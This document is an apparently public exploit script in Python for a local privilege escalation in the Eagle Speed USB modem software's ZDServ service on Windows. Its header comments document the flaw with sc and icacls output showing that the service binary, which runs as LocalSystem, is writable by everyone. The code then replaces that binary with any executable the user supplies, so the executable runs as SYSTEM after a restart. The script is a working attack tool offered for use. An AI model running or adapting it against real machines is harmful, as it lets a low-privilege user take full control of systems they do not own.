#!/usr/bin/python -w
# Title : Eagle Speed USB MODEM SOFTWARE Privilege Escalation
# Date : 28/11/2016
# Author : R-73eN 
# Tested on : Windows 7 ( Latest version of the software)
# Software : N/A ( Comes with the USB Modem)
# Vulnerability Description:
# When the Eagle Speed software is installed a service with name ZDServ is installed.
# The service itself has the right permissions which do not allow to reconfigure the binary
# but the path the binary is writable by any authenticated user.
#
# C:\Users\lowpriv>sc qc zdserv
# [SC] QueryServiceConfig SUCCESS
#
# SERVICE_NAME: zdserv
#        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
#        START_TYPE         : 2   AUTO_START
#        ERROR_CONTROL      : 1   NORMAL
#        BINARY_PATH_NAME   : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
#        LOAD_ORDER_GROUP   :
#        TAG                : 0
#        DISPLAY_NAME       : ZDServ
#        DEPENDENCIES       :
#        SERVICE_START_NAME : LocalSystem
#
#
#
# C:\Users\lowpriv>icacls "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
# C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe Everyone:(I)(F) <----------- Everyone has full permissions.
#                                           NT AUTHORITY\SYSTEM:(I)(F)
#                                           BUILTIN\Administrators:(I)(F)
#                                          Victim-PC\lowpriv:(I)(F)
#                                           BUILTIN\Users:(I)(RX)
#
# Successfully processed 1 files; Failed processing 0 files
#
# This exploit takes as a parameter an exe file that will replace the ZDServ.exe and will run
# with full privileges when the service/computer is restarted.
#
# Video : https://youtu.be/o59SD8gXzlU
#

import os
import sys
import filecmp
path = "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
file_move = 'move "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe" "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe.bak"'
banner = "\n\n"
banner +="  ___        __        ____                 _    _  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner


if(len(sys.argv) < 2):
    print '\n Usage : exploit.py program.exe\n'
    print 'https://infogen.al/'
else: 
    program = sys.argv[1]
    if(not os.path.isfile(program)):
        print "[-] The parameter was incorrect, use a correct filename [-]"
        exit(0)
    if(not os.path.isfile(path)):
        print "[-] File not found , propably service doesn't exists [-]\n"
    else:
        print "[+] Backing up the binary [+]"
        os.system(file_move)
        print "[+] Copying the payload [+]"
        os.system("copy " + program + " " + path)
        if(filecmp.cmp(program,path)):
            print "[+] Exploit successfull, wait for service to restart or reboot [+]"
        else:
            print "[-] Exploit failed [-]"